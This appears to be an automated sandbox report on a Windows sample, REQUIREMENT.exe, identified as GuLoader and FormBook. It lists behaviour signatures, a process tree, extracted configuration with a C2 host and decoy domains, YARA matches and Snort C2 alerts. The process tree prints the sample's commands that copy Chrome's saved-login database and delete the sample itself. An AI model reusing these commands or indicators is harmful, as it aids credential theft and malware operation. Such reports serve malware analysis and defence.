Play interactive tour

Edit tour

Windows Analysis Report REQUIREMENT.exe

Overview

General Information

Sample Name:	REQUIREMENT.exe
Analysis ID:	1641
MD5:	fb70ff484021669624233d0fbd77ec6a
SHA1:	6820b13631967663ec2637c43c828468633051fd
SHA256:	2b40757a6763aa725d86426ce3cd16fcf1380a9152837d4fbe5e5b085710054c
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Tries to steal Mail credentials (via file access)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64native

REQUIREMENT.exe (PID: 1776 cmdline: 'C:\Users\user\Desktop\REQUIREMENT.exe' MD5: FB70FF484021669624233D0FBD77EC6A)

REQUIREMENT.exe (PID: 1172 cmdline: 'C:\Users\user\Desktop\REQUIREMENT.exe' MD5: FB70FF484021669624233D0FBD77EC6A)

explorer.exe (PID: 680 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)

autoconv.exe (PID: 5024 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 469594005E3B94C5945BCCE7FC521C05)

autochk.exe (PID: 5612 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 95127C028063423E1253BD0C8CD6C9CB)

systray.exe (PID: 2092 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 28D565BB24D30E5E3DE8AFF6900AF098)

cmd.exe (PID: 2492 cmdline: /c del 'C:\Users\user\Desktop\REQUIREMENT.exe' MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cmd.exe (PID: 7420 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

firefox.exe (PID: 3076 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)

certmgr3ff.exe (PID: 1444 cmdline: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe MD5: FB70FF484021669624233D0FBD77EC6A)

certmgr3ff.exe (PID: 2676 cmdline: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe MD5: FB70FF484021669624233D0FBD77EC6A)

certmgr3ff.exe (PID: 7460 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)

certmgr3ff.exe (PID: 6616 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)

certmgr3ff.exe (PID: 7840 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)

certmgr3ff.exe (PID: 4776 cmdline: 'C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe' MD5: FB70FF484021669624233D0FBD77EC6A)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloa"}

Threatname: FormBook

{"C2 list": ["www.tpmionline.com/cogu/"], "decoy": ["bornhub.xyz", "hancofe.store", "bestofnapa.guide", "innerhell.space", "ryker.ink", "leschoixusa.com", "bqgfk.com", "yakyu-eiga.com", "martialkitchen.com", "thousandoaks-buickgmc.com", "researchlearningspirit.xyz", "byobuzz.com", "taichan.xyz", "ballznutcracker.com", "soymilk-design.com", "chalengestodo.com", "nu12.online", "hkautobox.com", "uprisehealthmonitoring.com", "027jia.net", "cacaolixir.com", "werasdfdfsadf.info", "sanchalanprokashon.com", "donlead.com", "dsnfryfufi.com", "laythproduction.com", "narcozland.com", "jachaljuega.com", "centralcontable.net", "agamottocoin.com", "congtyvhomes.com", "i8news-de.website", "estudio-me.com", "high-clicks.com", "boliden-ab.com", "nazfoodstuff.com", "sozialwirtschaft.team", "xn--4pvw92bcry.com", "6ohmf.info", "fishermandm.com", "marvellouslles.com", "suprabranding.net", "jkwhitleyphotography.com", "qylaser.net", "034455.com", "farbeo.com", "boggbeg.com", "domainair.biz", "gulfweeks.com", "alexanderorlandis.com", "earning-beauty.xyz", "shopsharpgraphics.com", "fdndigtavrcb.net", "ceruleden.com", "originial-motors.com", "ebbtidefloodtide.com", "ctlcloudfr.com", "bywl.top", "alo360.net", "cinargeridonusum.com", "xn--ahindelivery-3mc.com", "cryptoidolz.pro", "snowmanvila.com", "mobileiranian2.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000000.35242814301.0000000027517000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x11d14:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000D.00000002.37539395229.0000000004EB7000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x11d14:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6aa9:$sqlite3step: 68 34 1C 7B E1 0x6bbc:$sqlite3step: 68 34 1C 7B E1 0x6ad8:$sqlite3text: 68 38 2A 90 C5 0x6bfd:$sqlite3text: 68 38 2A 90 C5 0x6aeb:$sqlite3blob: 68 53 D8 7F 8C 0x6c13:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000D.00000002.37529342478.0000000002A26000.00000004.00000020.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x11528:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.35248315859.0000000027517000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x11d14:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000015.00000000.35190394827.0000000027517000.00000004.00020000.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x11d14:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000002.35598358285.00000000022C0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001C.00000002.35818096692.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000001A.00000002.35647851056.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000018.00000002.35540305146.0000000002290000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000001B.00000002.35777303082.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x6aa9:$sqlite3step: 68 34 1C 7B E1 0x6bbc:$sqlite3step: 68 34 1C 7B E1 0x6ad8:$sqlite3text: 68 38 2A 90 C5 0x6bfd:$sqlite3text: 68 38 2A 90 C5 0x6aeb:$sqlite3blob: 68 53 D8 7F 8C 0x6c13:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16aa9:$sqlite3step: 68 34 1C 7B E1 0x16bbc:$sqlite3step: 68 34 1C 7B E1 0x16ad8:$sqlite3text: 68 38 2A 90 C5 0x16bfd:$sqlite3text: 68 38 2A 90 C5 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Process Memory Space: REQUIREMENT.exe PID: 1172	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: systray.exe PID: 2092	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: certmgr3ff.exe PID: 2676	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: certmgr3ff.exe PID: 6616	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: certmgr3ff.exe PID: 4776	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 33 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000002.32667545706.00000000023B0000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloa"}
Source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.tpmionline.com/cogu/"], "decoy": ["bornhub.xyz", "hancofe.store", "bestofnapa.guide", "innerhell.space", "ryker.ink", "leschoixusa.com", "bqgfk.com", "yakyu-eiga.com", "martialkitchen.com", "thousandoaks-buickgmc.com", "researchlearningspirit.xyz", "byobuzz.com", "taichan.xyz", "ballznutcracker.com", "soymilk-design.com", "chalengestodo.com", "nu12.online", "hkautobox.com", "uprisehealthmonitoring.com", "027jia.net", "cacaolixir.com", "werasdfdfsadf.info", "sanchalanprokashon.com", "donlead.com", "dsnfryfufi.com", "laythproduction.com", "narcozland.com", "jachaljuega.com", "centralcontable.net", "agamottocoin.com", "congtyvhomes.com", "i8news-de.website", "estudio-me.com", "high-clicks.com", "boliden-ab.com", "nazfoodstuff.com", "sozialwirtschaft.team", "xn--4pvw92bcry.com", "6ohmf.info", "fishermandm.com", "marvellouslles.com", "suprabranding.net", "jkwhitleyphotography.com", "qylaser.net", "034455.com", "farbeo.com", "boggbeg.com", "domainair.biz", "gulfweeks.com", "alexanderorlandis.com", "earning-beauty.xyz", "shopsharpgraphics.com", "fdndigtavrcb.net", "ceruleden.com", "originial-motors.com", "ebbtidefloodtide.com", "ctlcloudfr.com", "bywl.top", "alo360.net", "cinargeridonusum.com", "xn--ahindelivery-3mc.com", "cryptoidolz.pro", "snowmanvila.com", "mobileiranian2.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: REQUIREMENT.exe

ReversingLabs: Detection: 48%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.33056187707.000000001E5F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32994766605.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532894515.0000000004590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.33045645431.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37532501994.0000000004560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.32944159535.0000000011CAC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Aidr0p8lx\certmgr3ff.exe

ReversingLabs: Detection: 48%

Source: REQUIREMENT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.78:443 -> 192.168.11.20:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.33:443 -> 192.168.11.20:49832 version: TLS 1.2

Source:	Binary string: systray.pdb source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp
Source:	Binary string: systray.pdbGCTL source: REQUIREMENT.exe, 00000003.00000002.33047271882.0000000000997000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: REQUIREMENT.exe, 00000003.00000002.33058899963.000000001EA8D000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001A.00000002.35658181746.000000001E950000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001B.00000002.35788695940.000000001EA8D000.00000040.00000001.sdmp, certmgr3ff.exe, 0000001C.00000002.35829603529.000000001EA7D000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: certmgr3ff.exe

Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DFA80 FindFirstFileW,FindNextFileW,FindClose,		13_2_027DFA80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027DFA79 FindFirstFileW,FindNextFileW,FindClose,		13_2_027DFA79

Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	13_2_027E62B9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop edi	13_2_027E5674
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then pop ebx	13_2_027D6AB8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49793 -> 51.77.52.109:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49795 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49796 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49807 -> 15.197.150.5:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49808 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49809 -> 142.250.186.179:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49820 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49841 -> 172.67.139.41:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 216.189.108.75:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 137.117.17.70:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49864 -> 192.0.78.25:80
